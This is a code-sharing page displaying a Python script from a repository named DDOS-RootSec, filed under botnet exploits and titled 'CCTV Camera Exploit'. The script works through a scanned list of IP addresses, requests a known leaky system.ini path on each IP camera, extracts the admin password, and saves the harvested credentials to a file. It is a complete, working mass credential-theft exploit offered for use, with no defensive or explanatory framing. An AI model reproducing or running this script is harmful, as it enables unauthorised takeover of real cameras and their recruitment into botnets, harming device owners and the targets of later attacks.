Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/Botnets/Exploits/IPCAM FULL/py3_ipcam_exploit.py
5038 views
1
import urllib.request, threading, socket, time, sys

2
if len(sys.argv) != 2:

3
	print("Correct useage: python " + sys.argv[0].split("\\").pop() + " <thread count> ")

4
	sys.exit()

5
	

6
lock, finalprintout, timeout, creds, threads, threadcount, leak, total = threading.Lock(), "", 5, [], [], int(sys.argv[1]), "http://TARGET/system.ini?loginuse&loginpas", 0

7


8
# Open output.txt

9
list = open("output.txt", "r")

10
scan = list.read()

11
list.close()

12


13
scan = scan.split("\n")

14
while "\n" in scan:

15
	scan.remove("\n")

16
pretotal = len(scan)

17
def dumpcreds():

18
	global finalprintout

19
	global total

20
	global scan

21
	while len(scan) > 0:

22
		try:

23
			with lock:

24
				ip = scan.pop()

25
			with urllib.request.urlopen(leak.replace("TARGET", ip), None, timeout) as response:

26
				reply = str(response.read())

27
				if reply.find("admin") != -1:

28
					reply = reply[reply.find("admin"):]

29
					while reply.find("\\x00") != -1:

30
						reply = reply.replace("\\x00", "")

31
					password = reply[5:reply.find("\\")]

32
					if password.find("/") != -1:

33
						password = password[:password.find("/")]

34
					print("\x1b[0;37m[\x1b[0;35m*\x1b[0;37m] |\x1b[0;35mFound\x1b[0;37m| admin:" + password + "@" + ip)

35
					with lock:

36
						finalprintout += ip + ":admin:" + password + "\n"

37
						total += 1

38
		except:

39
			pass

40


41
print("	\x1b[1;37m[\x1b[1;35m+\x1b[1;37m] \x1b[1;35mCCTV Camera Exploit \x1b[1;37m[\x1b[1;35m+\x1b[1;37m]\x1b[0m")

42
print("	\x1b[1;37m[\x1b[1;31m*\x1b[1;37m] \x1b[1;36mCredits go to ★Cam★ \x1b[1;37m[\x1b[1;31m*\x1b[1;37m]")

43
time.sleep(6)

44
print("      \x1b[1;35mDumping Credentials, please wait")

45
time.sleep(4)

46


47
for i in range(0, threadcount+1):

48
	threads.append(threading.Thread(target=dumpcreds))

49


50
for thread in threads:

51
	try:

52
		thread.daemon = True

53
		thread.start() 

54
	except:

55
		pass

56


57
for thread in threads:

58
	try:

59
		thread.join()

60
	except:

61
		pass

62
		

63
while 1:

64
	time.sleep(1)

65
	done = False

66
	for thread in threads:

67
		if thread.isAlive() == True:

68
			done = False

69
			break

70
		else:

71
			done = True

72
	if done == True:

73
		writingit = open("vuln.txt", "w")

74
		writingit.write(finalprintout)

75
		writingit.close()

76
		print(str(total) + " of out " + str(pretotal) + " credentials dumped, " + str(int(100 / pretotal * total)) + "% success rate. ")

77
		break

78